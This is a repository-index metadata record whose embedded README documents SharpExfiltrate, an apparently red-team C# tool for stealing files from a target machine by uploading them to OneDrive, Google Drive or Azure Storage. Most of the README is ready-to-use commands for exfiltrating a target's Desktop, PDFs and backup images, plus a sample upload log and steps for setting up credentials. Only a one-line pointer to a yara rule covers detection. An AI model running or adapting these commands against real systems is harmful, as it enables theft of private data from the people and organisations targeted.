{"id":18831772,"url":"https://github.com/flangvik/sharpexfiltrate","last_synced_at":"2025-04-14T04:16:44.878Z","repository":{"id":40312175,"uuid":"404354244","full_name":"Flangvik/SharpExfiltrate","owner":"Flangvik","description":"Modular C# framework to exfiltrate loot over secure and trusted channels.","archived":false,"fork":false,"pushed_at":"2021-09-12T17:08:02.000Z","size":43,"stargazers_count":125,"open_issues_count":0,"forks_count":37,"subscribers_count":3,"default_branch":"main","last_synced_at":"2025-04-14T04:16:40.819Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Flangvik.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null}},"created_at":"2021-09-08T13:17:00.000Z","updated_at":"2025-03-29T07:06:59.000Z","dependencies_parsed_at":"2022-06-29T05:57:28.197Z","dependency_job_id":null,"html_url":"https://github.com/Flangvik/SharpExfiltrate","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FSharpExfiltrate","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FSharpExfiltrate/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FSharpExfiltrate/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FSharpExfiltrate/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Flangvik","download_url":"https://codeload.github.com/Flangvik/SharpExfiltrate/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"
https://github.com","kind":"github","repositories_count":248819412,"owners_count":21166477,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-08T01:55:56.572Z","updated_at":"2025-04-14T04:16:44.859Z","avatar_url":"https://github.com/Flangvik.png","language":"C#","funding_links":[],"categories":[],"sub_categories":[],"readme":"# SharpExfiltrate\nSharpExfiltrate is a tiny but modular C# framework to exfiltrate loot over secure and trusted channels. It supports both single-files and full-directory paths (recursively), file extension filtering, and file size filtering.\nExfiltrated data will be compressed and encrypted before being uploaded.\nWhile exfiltrating a large amount of data will require the output stream to be cached on disk, smaller exfiltration operations can be done all in memory with the \"memoryonly\" option. 
\n\n# Usage\n\n```\n.\\SharpExfiltrate.exe OneDrive --username \u003credacted\u003e --password \"\u003credacted\u003e\" --filepath \"C:\\Users\\\u003credacted\u003e\\Downloads\\balenaEtcher-Setup-1.5.120.exe\"\n\n  __  _  _  __  ___ ___ _____   _____ _ _ _____ ___  __ _____ ___\n/' _/| || |/  \\| _ \\ _,\\ __\\ \\_/ / __| | |_   _| _ \\/  \\_   _| __|\n`._`.| \u003e\u003c | /\\ | v / v_/ _| \u003e , \u003c| _|| | |_| | | v / /\\ || | | _|\n|___/|_||_|_||_|_|_\\_| |___/_/ \\_\\_| |_|___|_| |_|_\\_||_||_| |___|\n@Flangvik - TrustedSec\n\n[+] Compressing C:\\Users\\\u003credacted\u003e\\Downloads\\balenaEtcher-Setup-1.5.120.exe 140,8MB\n[+] Password for Zip file is be4886d6a9004ed\n[+] Launching OneDrive module by @Flangvik\n[+] Performing Authentication using provided credentials\n[+] Confirming access to https://graph.windows.net\n[+] Starting OneDrive upload\n[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (7%)\n[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (14%)\n[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (28%)\n[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (35%)\n[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (64%)\n[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (71%)\n[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (85%)\n[+] Uploading DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip 140,5MB - (99%)\n[+] Upload completed, file located: https://\u003credacted\u003e-my.sharepoint.com/personal/\u003credacted\u003e/Documents/DESKTOP-4P9DIHS_20210911T1240UTC_balenaEtcher-Setup-1.5.120.zip\n```\n\nUpload the entire target's Desktop folder, including files and subfolders, using the OneDrive module.\n```\n.\\SharpExfiltrate.exe OneDrive --username foo.bar@example.com 
--password \"Passw0rd123!\" --filepath \"C:\\Users\\\u003cuser\u003e\\Desktop\"\n```\n\n\nUpload all PDFs from all subfolders in the target's root directory, compressing them all in memory, using the GoogleDrive module.\n```\n.\\SharpExfiltrate.exe GoogleDrive --appname SuperLegitApp --accesstoken \"\u003caccess-token-string\u003e\" --filepath \"C:\\Users\\\u003cuser\u003e\\\" --extensions \"pdf;\" --memoryonly\n```\n\n\nUpload all files from all subfolders that are smaller than 1 MB in the target's root directory, using the OneDrive module.\n```\n.\\SharpExfiltrate.exe OneDrive --username foo.bar@example.com --password \"Passw0rd123!\" --filepath \"C:\\Users\\\u003cuser\u003e\\\" --size 1\n```\n\n\nUpload a huge ISO image using the OneDrive module.\n```\n.\\SharpExfiltrate.exe OneDrive --username foo.bar@example.com --password \"Passw0rd123!\" --filepath \"C:\\Users\\\u003cuser\u003e\\Backup\\2021_09_09_Win10Image.iso\"\n```\n\n\nUpload all backup images that are less than 500 MB, using the Azure Storage Account module.\n```\n.\\SharpExfiltrate.exe AzureStorage --connectionstring \u003cconnection-string\u003e --filepath \"C:\\Users\\\u003cuser\u003e\\Backup\\Images\" --extensions \"vmdk;vmx;iso;ovf;ova;flp\" --size 500\n```\n\n\n# Modules\n\nEach module within SharpExfiltrate can be accessed with a module pre-verb.\n\n```\n.\\SharpExfiltrate.exe \n  __  _  _  __  ___ ___ _____   _____ _ _ _____ ___  __ _____ ___\n/' _/| || |/  \\| _ \\ _,\\ __\\ \\_/ / __| | |_   _| _ \\/  \\_   _| __|\n`._`.| \u003e\u003c | /\\ | v / v_/ _| \u003e , \u003c| _|| | |_| | | v / /\\ || | | _|\n|___/|_||_|_||_|_|_\\_| |___/_/ \\_\\_| |_|___|_| |_|_\\_||_||_| |___|\n@Flangvik - TrustedSec\n\n 1.1.0.0\n\n  OneDrive        Exfiltrate information using the OneDrive module\n\n  GoogleDrive     Exfiltrate information using the GoogleDrive module\n\n  AzureStorage    Exfiltrate information using the Azure Storage Account module\n\n  help            Display more information on a specific 
command.\n\n  version         Display version information.\n```\n## OneDrive\n\nThe OneDrive module uses a username and password to fetch an access token against the Graph API (OneDrive). Note that testing has only been done on Office365 business accounts (tenant joined). MFA needs to be disabled for the OAuth flow to work.\n```\n.\\SharpExfiltrate.exe OneDrive\n  __  _  _  __  ___ ___ _____   _____ _ _ _____ ___  __ _____ ___\n/' _/| || |/  \\| _ \\ _,\\ __\\ \\_/ / __| | |_   _| _ \\/  \\_   _| __|\n`._`.| \u003e\u003c | /\\ | v / v_/ _| \u003e , \u003c| _|| | |_| | | v / /\\ || | | _|\n|___/|_||_|_||_|_|_\\_| |___/_/ \\_\\_| |_|___|_| |_|_\\_||_||_| |___|\n@Flangvik - TrustedSec\n\n 1.1.0.0\n\n  -u, --username      Required. Username (email) for the OneDrive account to store exfiltrated data\n\n  -p, --password      Required. Password for the OneDrive account to store exfiltrated data\n\n  -f, --filepath      Required. Path to file or directory to be exfiltrated\n\n  -e, --extensions    Only exfiltrate files with given extensions, extension string seperated by ; (pdf;doc;xls)\n\n  -s, --size          Max filesize in MB, all files above this number will be ignored from exfiltration.\n\n  -m, --memoryonly    Create the compressed zip file entirely in memory.(Might cause OutOfMemoryException)\n\n  --help              Display this help screen.\n\n  --version           Display version information.\n  ```\n\n\n## GoogleDrive\nThe GoogleDrive module uses an access token that can be generated at https://developers.google.com/oauthplayground/. Scroll down until you find \"Drive API v3\" on the left-hand side. Click it and select ```https://www.googleapis.com/auth/drive.file```, go down and click \"Authorize APIs\", accept and follow the login steps. You should then be taken to a page where you generate and copy out your access token. 
Keep in mind that the access token expires after 3600 seconds.\n\n\n```\n.\\SharpExfiltrate.exe GoogleDrive\n\n  __  _  _  __  ___ ___ _____   _____ _ _ _____ ___  __ _____ ___\n/' _/| || |/  \\| _ \\ _,\\ __\\ \\_/ / __| | |_   _| _ \\/  \\_   _| __|\n`._`.| \u003e\u003c | /\\ | v / v_/ _| \u003e , \u003c| _|| | |_| | | v / /\\ || | | _|\n|___/|_||_|_||_|_|_\\_| |___/_/ \\_\\_| |_|___|_| |_|_\\_||_||_| |___|\n@Flangvik - TrustedSec\n\n 1.1.0.0\n\n  -n, --appname        Required. GoogleDrive Application name (Can be anything)\n\n  -t, --accesstoken    Required. Valid access token onbehalf of your GoogleDrive account\n\n  -f, --filepath       Required. Path to file or directory to be exfiltrated\n\n  -e, --extensions     Only exfiltrate files with given extensions, extension string seperated by ; (pdf;doc;xls)\n\n  -s, --size           Max filesize in MB, all files above this number will be ignored from exfiltration.\n\n  -m, --memoryonly     Create the compressed zip file entirely in memory.(Might cause OutOfMemoryException)\n\n  --help               Display this help screen.\n\n  --version            Display version information.\n  ```\n\n## Azure Storage Account\n\nThe Azure Storage Account module uses a connection string to create a subfolder (container) called \"loot\" to which it uploads the exfiltrated data. This requires a Storage Account to be created in Azure; the connection string can be found under \"Access keys\" in your Storage Account submenu.\n\n```\n.\\SharpExfiltrate.exe AzureStorage\n\n  __  _  _  __  ___ ___ _____   _____ _ _ _____ ___  __ _____ ___\n/' _/| || |/  \\| _ \\ _,\\ __\\ \\_/ / __| | |_   _| _ \\/  \\_   _| __|\n`._`.| \u003e\u003c | /\\ | v / v_/ _| \u003e , \u003c| _|| | |_| | | v / /\\ || | | _|\n|___/|_||_|_||_|_|_\\_| |___/_/ \\_\\_| |_|___|_| |_|_\\_||_||_| |___|\n@Flangvik - TrustedSec\n\n 1.1.0.0\n\n  -c, --connectionstring    Required. Connection string to your Azure Storage Account\n\n  -f, --filepath            Required. 
Path to file or directory to be exfiltrated\n\n  -e, --extensions          Only exfiltrate files with given extensions, extension string seperated by ; (pdf;doc;xls)\n\n  -s, --size                Max filesize in MB, all files above this number will be ignored from exfiltration.\n\n  -m, --memoryonly          Create the compressed zip file entirely in memory.(Might cause OutOfMemoryException)\n\n  --help                    Display this help screen.\n\n  --version                 Display version information.\n\n  ```\n\n\n\n## Detection / Defense\nSee the included yara rule :) \n\n\n# Credits\n\n* https://github.com/KoenZomers/OneDriveAPI (OneDrive API in .NET)\n* https://medium.com/geekculture/upload-files-to-google-drive-with-c-c32d5c8a7abc (Usage of Google Drive API in .NET)\n* https://github.com/googleapis/google-api-dotnet-client (Google Drive API in .NET)\n* https://github.com/Azure/azure-storage-net (Azure Storage API in .NET)\n* https://github.com/icsharpcode/SharpZipLib (ZIP API in .NET)\n* https://github.com/CCob/dnMerge (Merges all them deps into the binary)\n* https://github.com/GhostPack/Rubeus/blob/master/Rubeus.yar (Template for my yara rules)\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fflangvik%2Fsharpexfiltrate","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fflangvik%2Fsharpexfiltrate","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fflangvik%2Fsharpexfiltrate/lists"}